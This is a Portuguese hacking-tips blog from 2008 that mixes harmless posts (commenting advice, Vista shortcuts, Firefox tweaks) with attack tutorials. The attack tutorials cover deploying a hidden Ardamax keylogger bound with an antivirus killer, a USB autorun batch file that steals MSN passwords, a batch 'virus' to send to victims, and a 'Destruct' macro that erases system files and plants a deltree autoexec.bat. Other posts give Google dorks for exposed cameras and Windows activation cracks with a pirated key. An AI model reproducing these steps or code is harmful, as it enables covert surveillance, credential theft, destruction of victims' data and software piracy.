O equilàbrio é o segredo. Alguns programadores não põe comentírios, outros põe comentírios inúteis ou óbvios, outros ainda põe comentírios demais. estes últimos podem, as vezes, causar mais danos do que aqueles que nem comentam. Este tipo de código é cheio de comentírios redundantes, decoração e linhas em branco que não acrescentam nada.

'=============================== '""""""""" COMENTÁRIO """""""" '===============================

O bloco acima pode ser um neon para chamar a atenção í um comentírio, mas ele atrapalha. Ele gasta muito espaço na tela e acaba por fazer o código mais difàcil de lêr. Comentírios devem aparecer para comunicar informação que NàO é óbvia. Eles não devem interferir com a legibilidade do código, mas devem ser fíceis de achar se o programador os procura. Eles não devem usar mais espaço que o necessírio. Como regra geral, olhe para sua tela de código. Se você só vê comentírios algo estí errado, se você só vê código as chances são que você não estí sabendo antecipar adequadamente o que outro programador (ou você mesmo) pode precisar saber no futuro.

: : Longo Prazo : :
Muitos programas tiveram de ser completamente dilacerados ou até escritos novamente quando passados a um novo cliente ou vendidos a uma companhia. O porque? O programador não pensou a longo prazo.

Quando programamos, a ênfase é basicamente em fazer o programa funcionar. Como se o EXE fosse a única coisa que conta. Assim pensamos em curto prazo. Nós assumimos que enquanto entendermos o código tudo bem.

É bem mais importante pensar a longo prazo. O EXE não importa muito realmente, mas o código sim. Não deve ser suficiente que entendamos o código, mas que outros também possam entende-lo. Nós entregaremos e eles o pegarão e o modificarão com facilidade.

Pensar a longo prazo significa fazer comentírios que vão ajudar outros, mesmo que voce não precise deles (os comentírios). Significa usar convenções padrão para nomes mesmo que prefiramos nossa própria maneira de nomear componentes. Significa declarar tudo explicitamente mesmo quando você conhece os defaults. Significa usar código simples e facilmente legàvel mesmo sendo capaz dos mais variados truques e macetes. Significa evitar Property Pages. Significa escrever nosso código para os outros.

: : Moral da História : :
A moral da história aqui é que um programa que é legàvel mas não funciona direito é bem melhor do que um que funciona mas ninguém consegue entendê-lo. O primeiro pode ser consertado mas o segundo certamente terí que ser reescrito.

Atalhos De Teclado Windows Vista

2008-12-05T08:50:00.000-08:00

Atalhos De Teclado Windows Vista | Atalhos para acessibilidade:

*

SHIFT da direita por 8 segundos - liga e desliga teclas de filtragem
*

ALT esquerdo + SHIFT esquerdo + PRINT SCREEN (ou PrtScrn) - ativa e desativa o alto contraste de tela
*

ALT esquerdo + SHIFT esquerdo + NUM LOCK - ativa ou desativa as teclas do mouse
*

SHIFT cinco vezes - ativa ou sesativa as teclas de aderência
*

NUM LOCK por cinco segundos - ativa ou desativa todas as teclas de alternância
*

Tecla Windows + U - abre o Centro de Facilidade de Acesso do Windows Vista
Atalhos para o Windows Movie Maker:

*

J - volta um frame
*

K - pausa
*

L - avança um frame
*

I - marca um ponto de edição inicial
*

O - marca um ponto de edição final
*

M - divide um clip
*

HOME - pára e "rebobina" até o ponto de edição inicial
*

ALT+Seta para a direita - próximo frame
*

ALT+Seta para a esquerda - frame anterior
*

CTRL+K - pára e "rebobina" até o início
*

CTRL+P – reproduz ("toca") a partir do ponto atual
*

END - move até o ponto de edição final
*

PAGE UP - procura o primeiro ponto anterior de divisão
*

PAGE DOWN - procura o primeiro ponto posterior de divisão

Atalhos da Ajuda do Windows:

*

ALT+C - mostra o índice
*

ALT+N - mostra o menu de conexão, para alternar entre ajuda online e ajuda offline
*

F10 - mostra o menu de Opções
*

ALT+Seta para a esquerda - volta para tópico anterior
*

ALT+Seta para a direita - avança para pŕoximo tópico (desde que já tenha sido visualizado antes)
*

ALT+A - mostra a página de atendimento ao cliente
*

ALT+HOME - mostra a página inicial do centro de Ajuda e Suporte
*

HOME - move para o começo de um tópico
*

END - move para o final de um tópico
*

CTRL+F - busca palavras no tópico atual
*

CTRL+P - imprime o tópico atual
*

F3 - seleciona o campo do mecanismo de busca

Mais Tutoriais

2008-12-01T09:36:00.001-08:00

Tutorias Diversos

2008-12-01T09:06:00.000-08:00

Telefone:

Conexão 0800
Clike aqui para acessar.

Ligações graituitas
Clike aqui para acessar.

Escuta telefonica
Clike aqui para acessar.

Virus de celular
Clike aqui para acessar.

Cartões infinitos
Clike aqui para acessar.

Tutorias Diversos

Mirc em geral
Clike aqui para acessar.

Atacando canal vazio
Clike aqui para acessar.

Atacando um usuario
Clike aqui para acessar.

Roubando nick's
Clike aqui para acessar.

Clike aqui para ver mais tutoriais

Ver Cameras De Segurança Pelo Google

2008-12-01T08:59:00.000-08:00

Ver Cameras De Segurança Pelo Google | Vou explicar como faz…..!!

1° Abra o google www.google.com.br

2º Copie e cole um desses \/

inurl:ViewerFrame?Mode=”

inurl:MUltiCameraFrame:?Mode=”

inurl:view/index.shtml”

FACIL E SIMPLES ASSIM !!!

Conheça Os Dez Programas Espiões Que Mais Atacam

2008-12-01T08:55:00.000-08:00

Conheça Os Dez Programas Espiões Que Mais Atacam | Seu PC tem apresentado sintomas como lentidão exagerada, um aumento no número de janelas que se abrem com anúncios ou no aparecimento de sites não solicitados no navegador? Ele pode estar infectado com um spyware, um programa espião. Em 2004, o spyware cresceu tanto que hoje é considerado uma praga tão perigosa e indesejada quanto os vírus. De fato, está até se espalhando mais. De acordo com uma pesquisa da empresa Webroot, publicada no início deste mês, somente entre outubro e dezembro de 2004 houve um aumento de 114% nas ocorrências de trojans (cavalos de tróia), e de 230% naquelas ligadas a programas monitoradores de sistema. Os dados são baseados nos registros do serviço de rastreamento da empresa, o Spy Audit.

Tipos de spywares
Existem diversos tipos de programa espião. O adware é um programa que fica abrindo inúmeros popups com propaganda. Apesar de aparentemente inofensivo, nem sempre o único prejuízo é aguentar a chatice das janelas abrindo toda hora. Um adware pode instalar componentes que monitorem dados pessoais (incluindo idade, sexo, endereço, preferências de consumo e hábitos de navegação). Eventualmente o usuário é consultado e deve aceitar ou não a instalação do programa, mas com bastante freqüência isso não acontece, e o internauta simplesmente não sabe que está baixando um adware. Há casos em que, mesmo dizendo não, a instalação é feita.

Há também os adware cookies. Alguns cookies existem para economizar o seu tempo - como clicar numa caixinha para que o site lembre o seu user name na próxima vez em que você o acessar -, mas alguns sites depositam adware cookies, capazes de armazenar os dados pessoais do usuário e vender essa informação a outros sites. Assim, firmas de marketing podem criar um perfil de usuário baseado nessas informações pessoais e vender esse perfil para outras empresas. Lembrou do spam?

Já os monitoradores de sistema podem gravar tudo que é feito num PC, desde o que é digitado no teclado até os sites mais visitados e os programas que são utilizados, e podem enviá-los por e-mail para outra pessoa. Normalmente eles rodam em segundo plano e o usuário não os percebe.

Os trojans, ou cavalos de tróia, aparentam ser aplicações inofensivas e até úteis, mas na verdade são desenhados para codificar os dados do PC e até mesmo destruir o sistema. Alguns deles, chamados Rats (Remote Administration Tools, ou ferramentas remotas de administração) dão ao atacante o controle total do seu PC sempre que você estiver online. Esse atacante poderá, a distância, transferir arquivos, adicionar ou deletar arquivos e programas e até controlar o mouse e o teclado. Os trojans são distribuídos via e-mail, em arquivos anexados, mas também podem vir empacotados com outros programas.

A Webroot publicou uma listagem com os 10 piores spywares, os que mais apareceram durante os rastreamentos feitos pela empresa no ano passado. Conheça as principais “jóias” desta coleção - e fique atento a elas e aos seus “irmãozinhos”.

Campeões: os 10 piores

CoolWebSearch (CWS)
Ele toma conta do Internet Explorer de maneira que a página inicial e as buscas do navegador se dirigem a sites de quem controla o programa - sites pornôs, por exemplo, ou sites que vendem de programas piratas a “novidades” eletrônicas.
Gator (também conhecido como Gain)
É um programa adware que fica abrindo popups com publicidade no Internet Explorer, baseando-se nas preferências do usuário. Ele é instalado secretamente quando instalamos outras aplicações gratuitas como joguinhos ou programas de troca de arquivos.

Internet Optimizer:
Seus autores se adonam das páginas de erro do navegador (por exemplo, aquelas que aparecem quando se tenta ir a um endereço que não existe) e fazem com que elas levem o internauta a sites que eles decidem.

PurityScan
É um aplicativo que o usuário baixa do endereçoe www.purityscan.com. Ele promete apagar imagens pornográficas que se encontram no HD mas, na realidade, enche o navegador de janelas com propagandas.

n-CASE
É como o Gator, que se instala em segredo junto com outros programas e abre inúmeras janelas quando conhece os hábitos de navegação do usuário.

Transponder ou vx2
Vem embutido em determinadas aplicações gratuitas e se incrustra no Internet Explorer para monitorar os sites visitados. Além disso, ele também monitora os nomes de usuário e outros dados em formulários. Toda essa informação é usada para enviar publicidade personalizada.

ISTbar/AUpdate
É uma barra (semelhante à barra do Google e outras legítimas) que se instala no Internet Explorer. Seu objetivo é supostamente fazer buscas em sites pornográficos. Na realidade, ela seqüestra o navegador para dirigi-lo a determinadas páginas da Web.

KeenValue
É outro desses chatíssimos adwares que lançam popups com mensagens publicitárias.

Perfect Keylogger
Este programinha monitora e grava todos os sites visitados, as senhas e qualquer informação que se digite no teclado. Isso permite a quem o controle roubar informação confidencial do usuário, que pode ser usada para os mais diversos fins, inclusive criminosos.

TIBS Dialer
Este programa é um marcador telefônico automático. Ele conecta o PC, sem que o usuário perceba, a sites e serviços pornogrãficos que não são gratuitos. Pelo contrário, costumam ser bastante caros.

Fique longe deles
Estamos indicando, neste especial, links para dicas de como fazer downloads com segurança e para manter o seu Windows mais protegido destas e de outras pragas da Web. Mesmo assim repetimos aqui os conselhos mais básicos:
Como Limpar

Não precisamos reforçar a importância ter ter o seu windows sempre atualizado. Use para dar uma limpada geral o programa SPYBOT, consulte a seção download.

Uma dica importante é não instalar nada que vem quando você acessa um site qualquer. Já aconteceu isso, do nada aparece um programa para instalar? Ignore.

Tenha sempre um firewall instalado na sua máquina.

Ardamax Keylogger Indetectavel v2.8

2008-12-01T08:53:00.000-08:00

Ardamax Keylogger Indetectavel v2.8 | Instale o Ardamax Keylogger 2.8.
Vá em Enter Registration Code e adicione o serial:

Citação:
Nome: Nemesis
Número do serial: YKPJVSDPITIUTRL

Depois de instalado, devemos agora criar uma Instalador Remoto, para que sejam enviados
os logs para seu e-mail.

Deixe as opções como estão abaixo na parte de control.

Depois configure um e-mail que tenha smtp como bol e yahoo por exemplo...
E clique em test, tem que aparecer a seguinte imagem:

É recomendavel que você coloque para ele tirar PrintScreen de 1 em 1 hora para não "pessar"
a conexão da pessoa.
Depois escolho o local para ser salvo e está pronto seu install.
Agora vamos camuflar...

Inicie o RedBinder e Junte o install com o AvKiller:

Coloque os arquivos que achar úteis não esquecendo dos Avkiller e do Install!
Depois aperte juntar!
NÃO ESQUEÇA DE DESMARCAR COMPRIMIR COM UPX, POIS SENÃO ATRAPALHA O THEMIDA, OK?
Pronto!

Inicie o Themida:

Agora é só apertar protect!

Pronto! Agora é só enviar... Veja os resultados:

Lembrando que pode ser feito com Trojan servers, Keyloggers e o que quiser!

Capturando Senhas De MSN

2008-12-01T08:45:00.000-08:00

Capturando Senhas De MSN | Eu li em algum lugar cujo não me lembro faz algum tempo, lembrei esses dias atrás e testei aqui. O importante é que funciona. Lembrando que o tutorial eu quem fiz todo o texto ensinando do meu jeito.

Em resumo, o que é?
Bom, aqui, você vai precisar de ter acesso físico no computador da vítima. PODE ser que você não tenha tanta praticidade ou conhece outros meios de fazer isso. A vantagem deste meio para os outros, é que este é muito rápido e discreto. As vezes nem exige engenharia social. Eu estou falando de um Pen Drive. Funciona, basicamente, assim: você coloca o Pen Drive no computador da vítima, dá OK e tira. Não leva cinco segundos. Quando você chegar em sua casa, você abre a PASTA do seu pen drive, sem executar o programa indicado por ele, e vê a senha, que será salva em um documento de texto.

Materiais Necessários: Um Pen Drive, um programa chamado MSPASS e um computador.

Baixe o MSPASS em http://rapidshare.com/files/145184955/m ... o.rar.html e a senha para descompactar é hack-one.org/forum.

Vamos a prática:
Em seu Pen Drive, crie uma pasta com um nome qualquer de sua escolha. Neste tutorial, vou usar ForumInvaders como exemplo. Coloque o MSPASS lá. O interessante do MSPASS é que ele responde a comandos também no DoS, então vamos fazer um BAT que faça ele falar a senha. Vá em INICIAR >> EXECUTAR >> CMD.

Digite:
copy con autorun.bat
start ForumInvaders\mspass.exe /stext senha.txt

Dê Ctrl + C para interromper a operação e feche. Então está tudo OK. Ou Quase. Falta criar o Autorun.inf. Crie no bloco de notas um arquivo com os seguintes dados:

[autorun]
open=autorun.bat
ACTION = UmNomeDeSuaEscolhaParaAparecer

E salve como autorun.inf

Tudo OK. Agora vamos testar. Pode ser em sua própria máquina. Coloque seu PenDrive no USB e pronto. Depois é só verificar o conteúdo do PenDrive e ver que sua senha estará em senha.txt.

Pegar IP Usando IPGet

2008-12-01T08:40:00.000-08:00

Como Usar o IPGet

Ele irá pedir para importar,
ai vc importa…dps instale o WinPcap,
Abra o Prograa Winpcap,
na pasta dele no diretório Arquivos de Programa
Para ver o IP da pessoa, voce precisa ter uma conexão com ela
(jogo, manda arquivo por msn, etc), não é preciso aceitar o arquivo mandado por msn,
só de colok pra ele aceitar já dá..
aparecerá no cantinho o IP da pessoa, ao aparecer,
voce aperta nele. que ira abrir uma Pop-Up.

Comandos do IPGet:

/IPGet
Mostra o ip da pessoa.

/iplocate
Localiza o origina IP.

/iplog
Mostra os últimos acontecimentos relacionados com a IPGet,
útil para visualizar se você perdeu algum pop-up.

/ipconfig
Mostra as opções.

/ipabout
Mostra a janela sobre o IPGet.

/iphelp
Abre o “readme.txt” para ajuda-lo.

/ipupdate
Vê se tem novas versões do IPGet.

/ipshare
Compartilha o IPGet com seus contatos.

Download’s:
IpGet 1.50:
MSN Plus Live:

live messenger:

Adicionando 1GB Para Ajudar Memoria Do PC

2008-12-01T08:20:00.000-08:00

Adicionando 1GB Para Ajudar Memoria Do PC | A funçao do eBoostr é juntar a memoria dos dispositivos externos do pc com seu desempenho..ou seja. Você encaixa um pen-drive no pc ou ate 4 ao mesmo tempo e esse programa é capaz de acionar a memoria dos mesmos em prol do desemprenho do pc tornando-o mais rapido, Teste Feito por mim, e garanto que da certo sim =)

Ele é um programa pago pois ainda não lançou nenhuma versão que nao seja a de testes dele, mas vale a pena.

Ele funciona durante 4 horas a cada vez que seu pc é reiniciado, ou seja, quando o pc começa a rodar o windows, ele começa uma contagem regressiva de 4 horas, mas é um bom tempo para desfrutar do programa.

Entao vamoss lí;
Instalando o programa

Link do download : http://www.eboostr.com/files/eBoostr.exe
Tamanho: 728 KB

Primeiramente instale o programa normalmente sem nenhum segredo passando de passo a passo clicando em next, next e tal....
Apos instalar o programa ele perguntarí se voce quer reinicar o computador, entao você manda reiniciar pois enquanto ele reinicia você adiciona o dispositivo externo.

1- Após reinicia o windows. O eBoostr iría iniciar com a imagem abaixo.
Clique em continuar.

2- Agora você vai acionar a quantidade de espaço que vc quer utilizar do teu pen-drive, ex: eu coloquei apenas um MP3 de 1GB e entao coloquei para add um cache de 974MB, mas se você tem capacidade para mais, isso dependi de quanto é a capacidade de teu pen-drive. Veja o exemplo abaixo.

3- Após definir quanto é o tamanho cache que você iría desempenhar ao computador, ira abrir uma janelinha "allocating cache file" significa que o programa estará reservando o espaço do pen-drive para usar em prol do computador.

Enquanto isso o icone do programa na parte inferior perto de relogio irá ficar com cor amarela.. Quando passar a cor verde significara que ja foi feita a operaçao x) ai é so alegria.

Algumas imagens do programa:::

Painel de controle

Usando dois dispositivos

Checar velocidade

Criando o cache

Resultado do teste de velocidade xD

Converter bat to exe

2008-12-01T07:51:00.000-08:00

Titulo: Converter Bat to Exe

Arquivo: rar
Tamanho: 417 KB
Uploader: Rafael

Download:
Clike aqui.

Irfomação:

Esse programa serve para você converter seus virus .bat.

Criar virus de sacanagem.

2008-12-01T07:23:00.000-08:00

Esse virus quando ele é executado ele abre um monte de paginas de internet, você pode colocar qualquer site para a vitima quando ela executar o seu virus abrir um monte de paginas.

1° Abre o bloco de notas e coloque.

2° Depois cole esse codigo lá.

@ECHO OFF
:site
START http://www.xxx.com/
CLS
GOTO site

obs. no lugar de "http://www.xxx.com/" você coloca qualquer site exemplo "http://www.baixaki.com.br/" mais tem que colocar o "HTTP" na frente do site.

3° Depois que você colar o codigo você salva em ".bat" exemplo "virus.bat".

Depois que você salvar você envia para a vitima.

Ativar o windows vista sem programas

2008-07-05T14:14:00.000-07:00

1° Vai em Iniciar --> Clike com o botão direito no Prompt e executa pelo Administrador.

2° Depois você digita no Prompt --> "cd c:\windows\system32" (sem as aspas) e dá um [ENTER].

3° Depois você digita "slmgr.vbs -rearm"(sem as aspas) e dá um [ENTER].Depois que digitar o comando vai aparecer uma mensagem clika em ok.

4° Digite --> "date" (sem as aspas) e dá um [ENTER].Depois vai pedir para colocar um data e coloca "31/12/99"(sem as aspas) e dá um [ENTER].

5° Depois digite novamente "date" e dá um [ENTER].Mas quando pedir para colocar uma nova data coloque a data atual do dia ex.(05/07/2008).

6° Depois renicie o computador.

É só isso. Esses comandos vai confudir o Windows Vista e vai ativar o Windows.

Esse tutorial foi feito por By: Rafael não copiar o conteudo.

Ativar o windows xp

2008-06-22T08:12:00.000-07:00

Se você não consegue atualizar o Windows XP, ou está com uma notificação de que o Windows é falso, siga o seguinte tutorial para validação.

1. Vá em Iniciar > Executar

2. Digite regedit e clique em OK.

3. Já dentro do regedit, navegue até a chave:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WPAEvents

4. No painel à direita, clique duas vezes em OOBETimer

5. Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit

6. Vá novamente em Iniciar > Executar e dessa vez digite:
%systemroot%\system32\oobe\msoobe.exe /a

7. Na janela que foi aberta, escolha a opção Sim, desejo telefonar...

8. Na próxima etapa, clique no botão Alterar chave de produto.

9. Na etapa seguinte, digite a CD-Key:
THMPV-77D6F-94376-8HGKG-VRDRQ
e clique no botão Atualizar

10. Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o Windows.

11. Reiniciado o Windows vá novamente em Iniciar > Executar e digite:
%systemroot%\system32\oobe\msoobe.exe /a

12. Aparecerá a seguinte mensagem:

Ativação do Windows
O Windows já está ativado. Clique em OK para sair.

ganhe dinheiro facil

2008-06-22T08:08:00.000-07:00

Imagine um site que de dá U$ 6 Sò pra você se cadatrar no site.
E te da U$ 4 por click.
E U$ 1,25 por pessoa que você indica.
Parece até mentira ele te paga tudo no paypal
olha o comprovante abaixo
clique em cima da imagem para ampliar
» Informações

Hospedagem: RapidShare

Tamanho: 300kb

Formato: .rar/.doc

Estilo: Tutoriais
Servidor: RapidShare

formas para deixar seu computador rapido.

2008-06-22T07:57:00.000-07:00

1° passo- vai em "meu computador" clike com o botão direito.

2° passo- vai em "avançado" depois em "desepenho" depois em "configurações".

3° passo- marcar a opção "ajustar para obter um melhor desempenho" depois da ok e ok.

4° passo- vai no "desktop" clike com o batão direito vai em "propriedade".

5° passo- vai em "area de trabalho" no "plano de fundo" coloca a opção "nenhum" e depois vai em "personalizar área de trabalho".

6° passo- vai em "limpeza da área de trabalho" e desmar a opção.

7° passo- depois vai em "web" clike em "propiedade" e desmarque a opção depois ok e ok.

8° passo- vai em "proteção de tela" depois vai em "proteção de tela" e na opção coloque "em branco".

9° passo- vai em "energia" depois vai em "configurações para esquema casa/escritório" coloque todas as opções "nunca".

10° passo- vai em "avançado" e desmarque todas as opçoes.

para WINDOWS XP

Baixe videos do youtube sem programas

2008-06-22T07:56:00.000-07:00

Entre no site www.youtube.com.br e procure pelo video da qual vc deseja efetuar o download!!!

depois q encontrar o video desejado, clique para abrir como se vc fosse assistir.

após ter feito isso,va até a barra de endereços e la estara um link parecido com este:

http://youtube.com/watch?v=60J3uXrNRXs

depois q vc clicar na barra de endereços, apague a palavra " watch?" e apague tbm o sinal de igualdade " = " , no lugar do sinal de igualdade vc ponha " / " , irá fik assim:

http://youtube.com/v/60J3uXrNRXs

agora aperte enter, o video ira fik na tela inteira, após aparecer o video na tela inteira, v ira notar q o link esta diferente , ex:

http://youtube.com/swf/l.swf?video_id=60J3uXrNRXs&rel=1&eurl=&iurl=http%3A//img.youtube.com/vi/60J3uXrNRXs/default.jpg&t=OEgsToPDskIEk6Q8wje-YRNpaN7CjH8h

agora vc ira apagar " swf/l.swf " e coloar " get_video " ex abaixo :

http://youtube.com/get_video?video_id=60J3uXrNRXs&rel=1&eurl=&iurl=http%3A//img.youtube.com/vi/60J3uXrNRXs/default.jpg&t=OEgsToPDskIEk6Q8wje-YRNpaN7CjH8h

agora aperte enter e pronto, abrira a janela perguntando onde vc deseja salvar o arquivo.

OBS.: APÓS TERMINAR O DOWNLOAD N PONHA PRA EXECUTAR, BOTE PARA RENOMEAR, AI BOTE O NOME E APÓS O NOME PONHA " .flv " ( PONTO FLV )!!

Deixe Seu Firefox mais rápido

2008-06-22T07:46:00.000-07:00

1. Digite na barra de endereços do seu navegador:

about:config

na barra de endereços e tecle ENTER.

2. Procure pela sequência na caixa "Localizar Nome":

network.http.pipelining

Veja se o valor atrubuído à ela é true. Se não for, dê um duplo clique para mudar para esse valor.

3. Procure pela sequência:

network.http.pipelining.maxrequests

Dê um duplo clique nela e mude o valor para 8.

4. Em:

network.http.proxy.pipelinin

,dê um clique duplo e mude o valor para true.

5. Mude o valor de:

network.dns.disableIPv6

para true.

6. Agora, clique com o botão direito em qualquer valor na tela, e escolha Nova Opção:
Boolean

Dê o nome de:

content.interrupt.parsing

e valor true.

7. Clique com o botão direito em qualquer lugar, escolha Nova Opção:

Inteira

Dê o nome de:

content.max.tokenizing.time

e defina o valor para 2250000.

8. Novamente, crie uma nova entrada Inteira com o nome de:

content.notify.interval

com o valor de 750000.

9. Crie uma entrada Boolean com o nome:

content.notify.ontimer

e defina o valor para true.

10. Crie uma entrada Inteira com o nome de:

content.notify.backoffcoun

e valor 5.

11. Crie uma entrada Inteira com o nome:

content.switch.threshold

com o valor 750000.

12. Crie uma entrada Inteira com o nome:

nglayout.initialpaint.delay

com o valor 0.

Reinicie o Firefox e veja a diferença.

Destruct

2008-06-18T10:20:00.001-07:00

Essa é a técnica mais *FDP* que existe. Ela destrói os arquivos principais do computador. O DESTRUCT DESTRÓI O SISTEMA PARA SEMPRE. Destrói, literalmente o computador da vítima. Após receber um Destruct, pode jogar seu HD fora, e talvez até o processador... Sério mano ?? Mas como que funciona ?? É simples! Primeiro, destrói os arquivos-base do sistema, como io.sys, msdos.sys e command.com. Depois, cria um autoexec.bat, auto-destrutivo. Ou seja, Tudo que for inserido no computador é automaticamente destruído! "Mas e se o cara colocar um disco de boot ??" Não adianta! O sistema estará configurado para NÃO LER DISQUETES NEM CD-ROMS. O que significa que o cara não tem como fugir do autoexec.bat! Aí me aparece um lammer e fala: "Ow, mas e se o cara formatar ??" Que lammer idiota... Quando você conseguir formatar um computador que nem liga direito você me avisa tah... Tem uma única maneira de se salvar caso você receba um destruct. Pense um pouco e descubra.
Faça seu próprio Destruct, vai aí a base do código...

Sub MAIN

caminho$ = Ambiente$ ("Legado")

If caminho$ = "NOWAY" Then goto NoWay

On Error Goto NoWay

If dia(Agora()) > 7 and Mês(Agora()) <>

DefinirAtributo "C:\io.sys", 0

Open "C:\io.sys" For output as #1

Close #1

DefinirAtributo "C:\msdos.sys" 0

Open "C:\msdos.sys" For output as #1

Kill "C:\command.com"

End if

Open "C:\autoexec.bat" Fot output as 1

Print #1, @deltree /y *.* > nul"

Close #1

NoWay:

End Sub

Cyberkit

2008-06-18T10:19:00.001-07:00

Nesse manual eu vou dizer para que cada
coisa serve e aí vocês se viram ! Aí vai :

Primeira opção, ping :

Ahhhhhhhh kras ! Precisa explicar o que um ping faz ?
... Isso minha vó sabe ... Bem passemos a outra opção.

-------------------------

Segunda opção, TraceRout :

Vou tentar resumir. Esta opção "traça" as seguintes opções :

# = O número do host traçado.

Adress = O endereço IP do host.

Host Name = Host Name é o endereço do servidor
( ou outros ). ( Ex.: geocities.com )

Response time = Ahhhhh naum sabe inglês ? É
o tempo que o host
demorou a responder o TracerRout !

-------------------------

Terceira opção, Finger :

Naum acredito ! Quer saber isso ? Até um lamaH sabe o
que é finger ! Bem,
mas tá bom : Finger é uma antiga ferramenta usada para
descobrir informações de usuários de provedores ou mesmo
homepages.
Se você usar esta ferramenta normalmente aparecerá o
seguinte :

Server modo cidade

User-ID: Usuário que você quis aplicar um finger
E-mail alias: e-mail.do.kra@servidor.dele

Sorry, that User-ID has not filled out a Registry entry...

Nesta última mensagem, "Sorry, bla bla bla ..." quer
dizer que seu finger
nada mais foi que uma simples latinha de doces nas mãos
de um firewall. Bem,
resumindo : Você não pegou nada só o nome do usuário e o
e-mail alias dele.
Agora caso esta última mensagem não esteja aí, você teve
MUITA sorte mesmo.
Aparecerá algo tipo :

User I-D: Usuário que você quis aplicar um finger
E-mail alias: e-mail.do.kra@servidor.dele
Bla bla: bla bla bla
Bla bla: bla bla bla
Passwd: password do usuário ! ( Criptografado ou com shadow,
óbvio ! )

Pegue o passwd dele e desencriptografe, depois disso
divirta-se com login e senha
do otário.

-------------------------

Quarta opção, WhoIs :

WhoIs, é uma opção iqualzinha ao finger. Os dois claro
possuem uma diferença mas
essa diferença não cabe a mim lhes ensinar. Tanto faz
usar o Finger ou o WhoIs.
Mas o Finger é mais eficiente.

-------------------------

Quinta opção, NsLookUp :

Te da uma lista geral do seu server, nome do host local,
host do server, IP do
sever, alias local, alias do server, seu ip...

Ex.:

Local Hostname: phantom of illusion
Local IP Address: meu.ip.add.ress
Local Alias List: (null)
Hostname: meu.server.com
IP Address: ip.do.meu.server
Alias List: (null)
---

-------------------------

Sexta opção, QoD :

QoD, ou Quote of the Day. Isso eu não vou falar para que
server. Descubran
sozinho o resto foi de mão beijada mesmo !
Desculpem se desapontei alguém. A ora que me der na
telha eu faço outro
contando para que server o QoD.

Master's Paradise

2008-06-18T10:18:00.002-07:00

Um programador alemão chamado Dan Lehman lançou um
cavalo de tróia para Windows 95-98 chamado "Master's
Paradise". O Master's Paradise consiste em um client
chamado Master's Paradise o qual roda em um computador
remoto para ganhar acessp à qualquer computador
conectado à uma rede TCP/IP ou a Internet. É requerido
que um server executável seja instalado no computador da
vítima, para permitir o acesso remoto ao computador da
vítima de maneira similar ao "Back Orifice" da CdC. Como
no caso do "Back Orifice", esse programa explora as
vulnerabilidades da segurança da plataforma Windows
95-98 e não funciona em Windows NT. Os modos de
transferência do server incluem transferência através de
IRC e chat rooms da AOL, arquivos atachados em e-mail,
exploração de buracos na segurança de Browsers e
pragramas de e-mail e instalação física na máquina.

O server para o Master's Paradise foi embutido com um
programa legítimo. Nós primeiramente encontramos com um
arquivo chamado GAME.EXE o qual continha o popularmente
usado jogo parodiado chamado "Pie Bill Gates". Nessa
configuração, o server foi instalado como SYSEDIT.EXE
junto com um DLL chamado KeyHook.DLL, o qual foi
modificado da forma original, que existe em muitos
programas shareware. Na distribuição do GAME.EXE que nós
recebemos, foi provido um auto-instalador executável
embutido numa cópia sem licença do "TurboSFX file
extractor".

Outras vítimas desse trojan o receberam em arquivos
chamados "PICS.EXE" que diz conter figuras. Nesse caso,
o programa aparentemente não é executados por inteiro,
mas ele instala o server nas vítimas. Experimentos com o
cliente provou diversos error. Entretanto o server em si
foi feito para ser compativel com outros clientes de
outros trojans. Enquanto o server tem um design
diferente do Back Orifice, o comportamento é similar. O
server é similar, mas não igual ao server usado no Netbus.

Capacidades do Masters Paradise:

**Abrir/fechar o drive de CD-ROM

**Mostrar uma imagem selecionada, que pode ter o formato
BMP e JPG

**Inverter os botões esquerdo/direito do mouse

**Iniciar um aplicativo

**Tocar um som de extensão WAV

**Controlar o cursor da vítima

**Mandar uma mensagem para a tela do computador da vítima

**Desligar o computador, reiniciar, logoff...

**Ir à uma URL especificada pelo browser padrão

**Mandar comandos para os aplicativos abertos no
computador da vítima

**Logar tudo que a vítima digita e enviar para o
computador server

**Capturar a tela da vítima (mais ou menos como um Print
Scrn à distância)

**Colher informações sobre o computador alvo

**Fazer o upload/download/exclusão de arquivos

**Aumentar, diminuir o volume do som

**Gravar sons com o microfone (se há microfone) do
computador da vítima

**Fazer sons de "Click" toda vez que uma tecla é pressionada

**Teclas do teclado podem ser desativadas.

**Mostrar, fechar e tornar ativa uma janela do Windows.

Como tira o server ?

O server pode ser removido manualmente se ele estiver na
sua forma original como SYSEDIT.EXE. No Windows 95 e 98,
o server substitui o SYSEDIT, que nada mais é que um
software Microsoft que permite editar arquivos de sistema.

Como o nome do server pode ser qualquer um, o registro
do windows (pra quem não lembra, dá pra você editar os
registros executando o arquivo REGEDIT.EXE) deve ser
examinado para determinar o nome do server.

O arquivo KeyHook.DLL também é colocado no diretório
\WINDOWS ou \WINDOWS\SYSTEM\ que pode substituir
qualquer cópia deste arquivos que tenha sido instalado
legitimamente por um shareware. Como o trojan substitui
os arquivos legítimos, você pode precisar recuperá-los.

O próprio SYSEDIT.EXE pode ser recuperado com o cd do
Windows e o KeyHook.DLL com a cópia original do
shareware que o colocou lá. O server instalará uma
subchave de registro na chave:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Nessa chave você vai encontrar a subchave com o nome e o
local do server. Delete essa subchave, pois senão, não é
possível deletar os arquivos citados mais acima. Depois
de deletar a subchave, reboot seu computador e delete os
arquivos do server.

Deep Throat

2008-06-18T10:18:00.001-07:00

Esse programa é uma ferramenta de Administração Remota.

RemoteControl é usado para controlar os servidores e
Systempatch é o servidor . (O RemoteControl usa algumas
fontes que você talvez não tenha, se você não as tiver
ele instalará elas em c:\windows\fonts. Se por alguma
razão as fontes não funcionarem faça o download do
arquivo Fonts.zip da homepage do Deap Throat e
instale-as no seu diretório de fontes)

Acordo de Uso:

DeepThroat v2.0 é FREEWARE e não pode ser vendido nem se
pode cobrar pelo seu download. Usando esse programa você
concorda que o criador NÃO se responsabiliza pelo seu
uso. O criador NÃO se responsabiliza pelos danos
causados pela utilização desse programa. Basicamente se
algo acontecer o autor não tem nada a ver com o ocorrido.

"Em nenhuma circunstancia, o autor, será responsável
pelas conseqüências, acidentais ou não, ou danos
indiretos de qualquer tipo, ou por problema causado pelo
uso do programa."

Deep Throat 2.0 tem as seguintes funções:

